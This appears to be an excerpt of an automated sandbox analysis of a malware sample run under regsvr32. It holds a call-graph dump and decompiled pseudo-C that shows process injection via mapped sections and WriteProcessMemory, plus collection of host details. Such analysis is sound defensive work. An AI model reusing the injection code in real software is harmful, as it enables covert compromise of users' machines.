12695->12697 12695->12702 12699 316a484 12697->12699 12700 316a4bf 12699->12700 12701 316a4fa SetThreadPriority 12699->12701 12703 316a4e3 12700->12703 12705 3168ddf 2 API calls 12700->12705 12701->12702 12702->12655 12704 3168f63 memset 12703->12704 12704->12702 12705->12703 12707 316149f CreateMutexW 12706->12707 12720 31614ec 12706->12720 12708 31614b1 12707->12708 12707->12720 12709 3161080 2 API calls 12708->12709 12710 31614bb 12709->12710 12711 3169a76 RtlAllocateHeap 12710->12711 12710->12720 12712 31614cb 12711->12712 12713 3168d87 2 API calls 12712->12713 12714 31614d8 12713->12714 12807 3168dc9 RtlAllocateHeap 12714->12807 12716 31614e2 12716->12720 12808 3168dc9 RtlAllocateHeap 12716->12808 12718 3161503 12718->12720 12809 31674d8 12718->12809 12720->12657 12722 3163505 12721->12722 12724 316350a 12721->12724 12813 316cb18 12722->12813 12725 31636a0 12724->12725 12726 316d210 8 API calls 12725->12726 12727 31636bb 12726->12727 12732 31636c4 12727->12732 12820 3168dc9 RtlAllocateHeap 12727->12820 12729 31636d8 12737 31636e2 12729->12737 12821 316ce93 12729->12821 12731 3168ddf 2 API calls 12731->12732 12738 3162e9f 12732->12738 12737->12731 12739 316aaff 4 API calls 12738->12739 12740 3162ebd 12739->12740 12834 3162de9 12740->12834 12743 3162de9 3 API calls 12744 3162ee4 12743->12744 12838 316ab4b 12744->12838 12786 316f4d4 12785->12786 12787 316f510 12785->12787 12798 3168dc9 RtlAllocateHeap 12786->12798 12788 3169f6b 2 API calls 12787->12788 12790 316f51a 12788->12790 12792 3169a76 RtlAllocateHeap 12790->12792 12791 316f4e5 12795 316f533 12791->12795 12796 3168ddf 2 API calls 12791->12796 12793 316f526 12792->12793 12794 3168d87 2 API calls 12793->12794 12794->12795 12795->12687 12797 316f509 12796->12797 12797->12687 12798->12791 12799->12690 12801 316a2f8 12800->12801 12802 316a31d 12801->12802 12803 3168ddf 2 API calls 12801->12803 12804 316a333 12801->12804 12805 3168f63 memset 12802->12805 12803->12802 12804->12693 12805->12804 12806->12695 12807->12716 12808->12718 12810 31674dd 12809->12810 12811 316f0d9 8 API calls 12810->12811 12812 31674ef 12811->12812 12812->12720 12814 316cb2f 12813->12814 12815 316cb4e 12814->12815 12816 3169f85 2 API calls 12814->12816 12815->12724 12817 316cb5d lstrcmpiW 12816->12817 12818 316cb73 12817->12818 12819 3168d9a 2 API calls 12818->12819 12819->12815 12820->12729 12829 316cd08 12821->12829 12824 316cc72 12825 3169f85 2 API calls 12824->12825 12826 316cc98 12825->12826 12827 3168d9a 2 API calls 12826->12827 12828 316373c 12827->12828 12830 3168f63 memset 12829->12830 12831 316cd3f 12830->12831 12832 31636ee 12831->12832 12833 316cdf9 LocalAlloc 12831->12833 12832->12737 12832->12824 12833->12832 12835 3162df3 12834->12835 12837 3162e0a 12834->12837 12836 3168e5d 3 API calls 12835->12836 12836->12837 12837->12743 12845 316ab55 12838->12845 12846 316acb3 4 API calls 12845->12846 12847 3162eef 12846->12847 12967->11451 12968->11453 12985 3162701 12987 3162712 12985->12987 12991 316272a 12985->12991 12993 31670a0 12987->12993 12990 3169e22 2 API calls 12992 3162743 12990->12992 13016 316267d 12991->13016 12994 31670c2 12993->12994 13007 31670ba 12993->13007 12995 316bfc8 2 API calls 12994->12995 12996 31670cb 12995->12996 12996->13007 13023 3170e8e 12996->13023 12999 31670e5 13000 3168ddf 2 API calls 12999->13000 13000->13007 13003 316670a 5 API calls 13004 316712d 13003->13004 13005 316713a 13004->13005 13008 3167152 13004->13008 13006 3168ddf 2 API calls 13005->13006 13006->13007 13007->12991 13015 3167172 13008->13015 13042 3165c05 13008->13042 13010 3168ddf 2 API calls 13011 31671a4 13010->13011 13012 3168ddf 2 API calls 13011->13012 13012->12999 13013 316716e 13014 316abf8 6 API calls 13013->13014 13013->13015 13014->13015 13015->13010 13017 316bfc8 2 API calls 13016->13017 13018 316268e 13017->13018 13019 31626b2 13018->13019 13020 31626a5 13018->13020 13048 316adc2 13018->13048 13019->12990 13022 3168ddf 2 API calls 13020->13022 13022->13019 13024 3170e9d 13023->13024 13025 3170ed9 13023->13025 13027 3168ddf 2 API calls 13024->13027 13047 3168dc9 RtlAllocateHeap 13025->13047 13028 3170ea6 13027->13028 13029 3168e2e RtlAllocateHeap 13028->13029 13031 31670df 13028->13031 13030 3170ebd 13029->13030 13030->13031 13032 316fb9c lstrlenW 13030->13032 13031->12999 13033 3169993 13031->13033 13032->13031 13034 3169f85 2 API calls 13033->13034 13035 31699a3 13034->13035 13036 31698e9 2 API calls 13035->13036 13037 31699c2 13036->13037 13038 3169c50 2 API calls 13037->13038 13039 31699d4 13038->13039 13040 3168d9a 2 API calls 13039->13040 13041 316711b 13040->13041 13041->13003 13041->13007 13043 316b6e3 7 API calls 13042->13043 13044 3165c28 13043->13044 13045 316b787 2 API calls 13044->13045 13046 3165c40 13044->13046 13045->13046 13046->13013 13047->13028 13049 316adde 6 API calls 13048->13049 13050 316add9 13049->13050 13050->13020 13475 316243b 13476 3162478 13475->13476 13477 316246b 13475->13477 13479 31698e9 2 API calls 13476->13479 13498 3162482 13476->13498 13506 3169ca5 13477->13506 13480 31624a5 13479->13480 13481 316bfc8 2 API calls 13480->13481 13482 31624bd 13481->13482 13483 3169b26 2 API calls 13482->13483 13490 31624c4 13482->13490 13485 31624d3 13483->13485 13484 3168ddf 2 API calls 13486 3162628 13484->13486 13513 316c4d1 memset 13485->13513 13488 3168ddf 2 API calls 13486->13488 13489 3162633 13488->13489 13491 3168ddf 2 API calls 13489->13491 13490->13484 13499 316263f 13491->13499 13492 3162667 13495 3169e22 2 API calls 13492->13495 13493 316265c 13497 3168ddf 2 API calls 13493->13497 13494 3169f85 2 API calls 13505 31624de 13494->13505 13495->13498 13496 3168ddf 2 API calls 13496->13499 13497->13492 13499->13492 13499->13493 13499->13496 13500 3169c50 RtlAllocateHeap lstrcatW 13500->13505 13501 3168d9a 2 API calls 13501->13505 13502 3169ab3 RtlAllocateHeap 13502->13505 13503 316b787 memset GetExitCodeProcess 13503->13505 13504 3168ddf HeapFree memset 13504->13505 13505->13490 13505->13494 13505->13500 13505->13501 13505->13502 13505->13503 13505->13504 13509 3169cbc 13506->13509 13508 3169d22 13508->13476 13528 3168dc9 RtlAllocateHeap 13509->13528 13510 3169cfd lstrcatA 13511 3169d11 lstrcatA 13510->13511 13512 3169cf2 13510->13512 13511->13512 13512->13508 13512->13510 13529 3168dc9 RtlAllocateHeap 13513->13529 13515 316c4f8 13516 3169ab3 RtlAllocateHeap 13515->13516 13527 316c57c 13515->13527 13517 316c516 13516->13517 13518 3169ab3 RtlAllocateHeap 13517->13518 13519 316c529 13518->13519 13520 3169ab3 RtlAllocateHeap 13519->13520 13521 316c53d 13520->13521 13522 3169f85 2 API calls 13521->13522 13523 316c54a 13522->13523 13524 3168d9a 2 API calls 13523->13524 13525 316c570 13524->13525 13526 3169ab3 RtlAllocateHeap 13525->13526 13526->13527 13527->13505 13528->13512 13529->13515 12969 3166438 12970 3166448 ExitProcess 12969->12970 15168 31657a0 15173 316e565 15168->15173 15171 31657b5 GetLastError 15172 31657be 15171->15172 15198 3168dc9 RtlAllocateHeap 15173->15198 15175 316e57c 15176 31657b1 15175->15176 15177 3169ab3 RtlAllocateHeap 15175->15177 15176->15171 15176->15172 15178 316e591 15177->15178 15178->15176 15199 316a5fe 15178->15199 15181 3169f85 2 API calls 15182 316e5af 15181->15182 15183 3169fe4 2 API calls 15182->15183 15184 316e5c4 15183->15184 15185 3168d9a 2 API calls 15184->15185 15186 316e5cd 15185->15186 15207 316e3b5 15186->15207 15188 316e5d7 15189 316e5de 15188->15189 15214 316e3f9 15188->15214 15191 3168ddf 2 API calls 15189->15191 15192 316e6b1 15191->15192 15193 3168ddf 2 API calls 15192->15193 15194 316e6bc 15193->15194 15195 3168ddf 2 API calls 15194->15195 15195->15176 15196 316e5ed 15196->15189 15197 316e684 lstrlenW 15196->15197 15197->15196 15198->15175 15200 316a617 15199->15200 15201 3168e5d 3 API calls 15200->15201 15205 316a692 15200->15205 15206 316a717 15200->15206 15201->15205 15202 316a6ef 15204 3168f63 memset 15202->15204 15202->15206 15203 3168ecb lstrlenW 15203->15205 15204->15206 15205->15202 15205->15203 15206->15181 15208 3169f85 2 API calls 15207->15208 15209 316e3c7 15208->15209 15227 3169eab 15209->15227 15212 3168d9a 2 API calls 15213 316e3dc 15212->15213 15213->15188 15215 3169c50 2 API calls 15214->15215 15216 316e412 CoInitializeEx 15215->15216 15217 3169f85 2 API calls 15216->15217 15218 316e42d 15217->15218 15219 3169f85 2 API calls 15218->15219 15220 316e43e 15219->15220 15221 3168d9a 2 API calls 15220->15221 15222 316e45a 15221->15222 15223 3168d9a 2 API calls 15222->15223 15224 316e470 15223->15224 15225 3168ddf 2 API calls 15224->15225 15226 316e47b 15225->15226 15226->15196 15228 31698e9 2 API calls 15227->15228 15229 3169ecc 15228->15229 15230 3169c50 2 API calls 15229->15230 15231 3169eed 15230->15231 15231->15212 15301 316fbd6 15304 3168dc9 RtlAllocateHeap 15301->15304 15303 316fbe6 15304->15303 15324 31657c3 15325 3169eab 4 API calls 15324->15325 15326 31657db 15325->15326 15341 31658c4 15326->15341 15343 3168dc9 RtlAllocateHeap 15326->15343 15328 31657f2 15329 3169f6b 2 API calls 15328->15329 15328->15341 15330 316580a 15329->15330 15331 3169fa5 2 API calls 15330->15331 15332 316581f 15331->15332 15333 3168d87 2 API calls 15332->15333 15334 3165827 15333->15334 15335 3168ddf 2 API calls 15334->15335 15336 3165842 15335->15336 15337 316b787 2 API calls 15336->15337 15342 3165850 15337->15342 15338 316c402 11 API calls 15338->15342 15339 31658b9 15340 3168ddf 2 API calls 15339->15340 15340->15341 15342->15338 15342->15339 15343->15328 13894 316286e 13895 3162964 13894->13895 13896 3162885 13894->13896 13897 3169e22 2 API calls 13895->13897 13898 316bfc8 2 API calls 13896->13898 13899 3162970 13897->13899 13900 3162891 13898->13900 13900->13895 13924 3169f14 13900->13924 13903 3169b26 2 API calls 13905 31628b5 13903->13905 13904 3168ddf 2 API calls 13904->13895 13928 316bf56 13905->13928 13907 31628c8 13908 3169b26 2 API calls 13907->13908 13920 316293d 13907->13920 13910 31628d4 13908->13910 13909 3168ddf 2 API calls 13911 316294b 13909->13911 13912 316109a 2 API calls 13910->13912 13913 3168ddf 2 API calls 13911->13913 13914 31628e0 13912->13914 13915 3162956 13913->13915 13916 3169c50 2 API calls 13914->13916 13915->13904 13917 31628f1 13916->13917 13918 3168d9a 2 API calls 13917->13918 13919 31628ff 13918->13919 13919->13920 13921 316b787 2 API calls 13919->13921 13920->13909 13922 316291d 13921->13922 13923 3168ddf 2 API calls 13922->13923 13923->13920 13925 3169f1d 13924->13925 13927 31628a3 13924->13927 13931 3168dc9 RtlAllocateHeap 13925->13931 13927->13903 13927->13915 13932 3168dc9 RtlAllocateHeap 13928->13932 13930 316bf7b 13930->13907 13931->13927 13932->13930

            Executed Functions

            Function 0316D538 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 95%
            			E0316D538(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x317f8d4; // 0x4fafc00
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E0316F15B(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x317f9d0; // 0x4fafa00
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x317f8d0; // 0x4faf8c0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x317ce70; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x317f8d0; // 0x4faf8c0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E03168E2E( *0x317f8d4, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E03168DDF( &_v36, 0x1ac4);
					_t119 =  *0x317f8d4; // 0x4fafc00
					_t155 =  *0x317f8e8; // 0x3160000
					_v36 = _t119;
					 *0x317f8e8 = _v8;
					 *0x317f8d4 = _t163;
					E03168EA6(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E0316D4B7(_v16, _v8, _v44);
					_t124 = E0316A5D0("Jjischug");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x317f8e8 = _t155;
						 *0x317f8d4 = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































            0x0316d53e
            0x0316d544
            0x0316d546
            0x0316d54a
            0x0316d54c
            0x0316d54f
            0x0316d552
            0x0316d555
            0x0316d558
            0x0316d55b
            0x0316d566
            0x0316d569
            0x0316d570
            0x0316d570
            0x0316d575
            0x0316d578
            0x0316d57a
            0x0316d57d
            0x0316d586
            0x0316d77f
            0x0316d77f
            0x0316d782
            0x0316d785
            0x0316d78a
            0x0316d790
            0x0316d793
            0x0316d793
            0x0316d796
            0x0316d79a
            0x0316d79c
            0x0316d7b1
            0x0316d7b1
            0x0316d7bb
            0x0316d7c5
            0x0316d7c5
            0x0316d7cc
            0x0316d7cc
            0x0316d595
            0x0316d5af
            0x00000000
            0x00000000
            0x0316d5b5
            0x0316d5bd
            0x0316d5c5
            0x0316d5cb
            0x0316d5d2
            0x0316d5da
            0x0316d5db
            0x0316d5e2
            0x0316d5e5
            0x0316d5e6
            0x0316d5ed
            0x0316d5f0
            0x0316d5f7
            0x0316d5f8
            0x0316d5fb
            0x0316d607
            0x0316d629
            0x0316d631
            0x0316d634
            0x0316d63f
            0x0316d63f
            0x0316d631
            0x0316d65b
            0x0316d66a
            0x0316d66d
            0x0316d672
            0x00000000
            0x0316d69c
            0x0316d6ac
            0x0316d6ae
            0x0316d6b5
            0x00000000
            0x00000000
            0x0316d6ca
            0x0316d6dd
            0x0316d6f1
            0x0316d6fd
            0x0316d702
            0x0316d707
            0x0316d70d
            0x0316d713
            0x0316d71b
            0x0316d72b
            0x0316d737
            0x0316d741
            0x0316d749
            0x0316d74e
            0x0316d751
            0x0316d759
            0x0316d759
            0x0316d759
            0x0316d75c
            0x0316d760
            0x0316d761
            0x0316d765
            0x0316d769
            0x0316d772
            0x0316d778
            0x00000000
            0x0316d778
            0x0316d753
            0x0316d757
            0x00000000
            0x00000000
            0x00000000
            0x0316d757

            APIs
            • NtCreateSection.NTDLL(0316DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0316D5AA
            • RegisterClassExA.USER32(?), ref: 0316D5FE
            • CreateWindowExA.USER32 ref: 0316D629
            • DestroyWindow.USER32(00000000), ref: 0316D634
            • UnregisterClassA.USER32 ref: 0316D63F
            • NtMapViewOfSection.NTDLL(0316DA07,00000000), ref: 0316D66A
            • NtMapViewOfSection.NTDLL(0316DA07,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0316D691
            • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0316D6D7
            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0316D6F1
              • Part of subcall function 03168DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03168E25
            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,03166297), ref: 0316D769
            • NtUnmapViewOfSection.NTDLL(00000000), ref: 0316D7B1
            • NtClose.NTDLL(00000000), ref: 0316D7C5
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
            • String ID: 0$18293$Jjischug$aeroflot
            • API String ID: 494031690-3772587274
            • Opcode ID: 6b9a517292989289bf433dd596e445218765cdcde545ecd6c8b449e6e118c52e
            • Instruction ID: dbb5de0baf0f33fcd6a52f9c302a04383aaef4be3fecac70ea70e70a78afcd0e
            • Opcode Fuzzy Hash: 6b9a517292989289bf433dd596e445218765cdcde545ecd6c8b449e6e118c52e
            • Instruction Fuzzy Hash: 5F81F9B5A00219AFDB14EFD5D884EEEBBF8FF0C704F18406AE505A7294D7709991CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316DFC2 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 250COMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 79%
            			E0316DFC2(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x317f8e8; // 0x3160000
				_t68 = E03168DC9(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x317f8d0; // 0x4faf8c0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E031735A9( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x317f8d0; // 0x4faf8c0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E031697E9(_t194, _t207);
					}
					_t75 =  *0x317f8d0; // 0x4faf8c0
					_t77 = E0316CA0A( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E0316CB85( *_t77) == 0) {
						_t79 = E0316CA5A(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E0316F3A0(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E0316F365(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x317f8d8; // 0x4fafab0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E0316DFBB(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E031697E9(_t149, _t211);
					}
					_t92 = E0316C85A();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E0316C64D(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E03169BD5(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E03169803(_t149, _t36);
					_t97 = E0316E34A(_t196, E0316A5D0(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E0316C870(_t97, _t37, _t216);
					_t99 =  *0x317f8d0; // 0x4faf8c0
					_t101 = E0316CBD7( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E03168F63(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E0316DDBE(_t100);
					_t106 = E0316DDE7(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E03169F85(_t105, 0xf73);
					_t177 =  *0x317f8d0; // 0x4faf8c0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x317f8d0; // 0x4faf8c0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E03168D9A( &_v8);
					_t113 =  *0x317f8d0; // 0x4faf8c0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E03169FE4(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x317f8d0; // 0x4faf8c0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x317f8d0; // 0x4faf8c0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x317f8d0; // 0x4faf8c0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x317f8d0; // 0x4faf8c0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x317f8d0; // 0x4faf8c0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x317f8d0; // 0x4faf8c0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E031735A9(E0316E34A(_t62, E0316A5D0(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E0317357B( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E031698D0(_t66, _t191);
					_t134 = E0316DB68(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}























































            0x0316dfc2
            0x0316dfcc
            0x0316dfd8
            0x0316dfdd
            0x0316dfe2
            0x0316dfef
            0x0316dff5
            0x0316dffa
            0x0316e000
            0x0316e010
            0x0316e015
            0x0316e01a
            0x0316e01a
            0x0316e02a
            0x0316e030
            0x0316e032
            0x0316e03b
            0x0316e03b
            0x0316e041
            0x0316e04e
            0x0316e053
            0x0316e059
            0x0316e062
            0x0316e070
            0x0316e077
            0x0316e07c
            0x0316e07c
            0x0316e07d
            0x0316e064
            0x0316e064
            0x0316e064
            0x0316e083
            0x0316e089
            0x0316e08e
            0x0316e094
            0x0316e099
            0x0316e09f
            0x0316e09f
            0x0316e0a8
            0x0316e0ae
            0x0316e0b2
            0x0316e0b9
            0x0316e0c0
            0x0316e0c7
            0x0316e0cb
            0x0316e0d2
            0x0316e0d3
            0x0316e0d5
            0x0316e0da
            0x0316e0e1
            0x0316e0e3
            0x0316e0e3
            0x0316e0f3
            0x0316e0f8
            0x0316e0f8
            0x0316e105
            0x0316e10b
            0x0316e110
            0x0316e112
            0x0316e11b
            0x0316e11b
            0x0316e123
            0x0316e128
            0x0316e128
            0x0316e12e
            0x0316e139
            0x0316e13e
            0x0316e146
            0x0316e14c
            0x0316e154
            0x0316e166
            0x0316e16c
            0x0316e174
            0x0316e179
            0x0316e186
            0x0316e197
            0x0316e19d
            0x0316e1a2
            0x0316e1a5
            0x0316e1a8
            0x0316e1b5
            0x0316e1bb
            0x0316e1c5
            0x0316e1c5
            0x0316e1cb
            0x0316e1d3
            0x0316e1de
            0x0316e1e3
            0x0316e1e9
            0x0316e1eb
            0x0316e1f8
            0x0316e1f9
            0x0316e1fa
            0x0316e205
            0x0316e207
            0x0316e20e
            0x0316e20e
            0x0316e218
            0x0316e21d
            0x0316e222
            0x0316e222
            0x0316e228
            0x0316e22f
            0x0316e230
            0x0316e23d
            0x0316e250
            0x0316e255
            0x0316e25a
            0x0316e263
            0x0316e263
            0x0316e269
            0x0316e26e
            0x0316e274
            0x0316e27a
            0x0316e27f
            0x0316e288
            0x0316e28a
            0x0316e291
            0x0316e291
            0x0316e297
            0x0316e29f
            0x0316e2a4
            0x0316e2a5
            0x0316e2aa
            0x0316e2b3
            0x0316e2b5
            0x0316e2c0
            0x0316e2c0
            0x0316e2c9
            0x0316e2d1
            0x0316e2d8
            0x0316e2dd
            0x0316e2ec
            0x0316e304
            0x0316e30b
            0x0316e319
            0x0316e324
            0x0316e325
            0x0316e329
            0x0316e32f
            0x0316e330
            0x0316e338
            0x0316e33d
            0x00000000
            0x0316e345
            0x0316e349

            APIs
              • Part of subcall function 03168DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03169793,00000100,?,0316661B), ref: 03168DD7
            • GetCurrentProcessId.KERNEL32 ref: 0316DFE9
            • GetLastError.KERNEL32 ref: 0316E0E3
            • GetSystemMetrics.USER32(00001000), ref: 0316E0F3
            • GetVersionExA.KERNEL32(00000000), ref: 0316E1A8
              • Part of subcall function 0316CA5A: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,03160000), ref: 0316CAFE
            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0316E1D3
            Strings
            Memory Dump Source
